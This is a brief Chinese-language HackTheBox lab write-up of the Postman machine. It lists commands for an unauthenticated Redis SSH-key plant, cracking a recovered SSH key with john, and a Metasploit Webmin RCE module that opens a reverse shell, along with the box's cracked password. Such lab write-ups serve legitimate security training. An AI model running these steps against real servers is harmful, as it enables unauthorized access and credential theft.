HTB靶機wp
只爲記錄
redis未授權
ssh-keygen -t rsa -C "redis@fuck"
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
redis-cli -h 10.10.10.160 flushall
cat ssh.txt | redis-cli -h 10.10.10.160 -x set ssh_key
redis-cli -h 10.10.10.160
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG GET dir
CONFIG SET dbfilename "authorized_keys"
save
ssh -i fuck [email protected]
連上去沒有權限,使用這個提權 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
找到一個敏感信息
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak
Matt用戶的id_rsa.bak把他保存到本地爲matt_key
要想使用john來破解,先要將其轉爲john支持的格式,這裏使用ssh2john.py
./ssh2john.py /home/parrot/matt_key > /home/parrot/matt_hash
這裏要解壓/usr/share/wordlists/rockyou.txt.gz
使用gunzip
john --wordlist=/usr/share/wordlists/rockyou.txt matt_hash
切換Matt用戶
再次查看user.txt
得到一個flag
webmin
直接訪問10.10.10.160:10000報錯,修改本地hosts文件
再次訪問,得到webmin的登錄面板 使用Matt,computer2008可以登錄
use exploit/linux/http/webmin_packageup_rce
set rhosts 10.10.10.160
set ssl true
set username Matt
set password computer2008
set lhost 10.10.14.207
exploit
本文參考